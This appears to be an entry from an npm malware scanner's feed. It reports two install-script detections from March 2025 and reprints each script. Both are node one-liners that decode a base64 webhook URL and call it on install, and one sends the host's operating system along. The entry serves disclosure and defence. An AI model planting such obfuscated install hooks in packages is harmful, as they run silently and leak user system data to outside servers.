Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
Follow our π / Twitter feed for updates.
Detected: 13 Mar 2025
Detected Date: 13 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
This script sends an HTTP request to a potentially malicious URL that is constructed from a base64-encoded string. The URL includes information about the operating system, which could be used by an attacker to exploit vulnerabilities specific to that OS. This behavior can lead to further attacks or data leakage.
Install script:
node -e "require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString() + '?os=' + encodeURIComponent(process.platform)).setTimeout(100).on('timeout', () => {}).end()"Detected: 13 Mar 2025
Detected Date: 13 Mar 2025
Affected Install Script: postinstall
Package Source: βοΈ View on Npm
The script makes an HTTPS request to a decoded URL (which appears to be a base64 encoded string) without any user interaction or permission. This can potentially be used to download and execute malicious code or to communicate with a remote server in a way that could compromise system security.
Install script:node -e "require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString()).setTimeout(100).on('timeout', () => {}).end()"
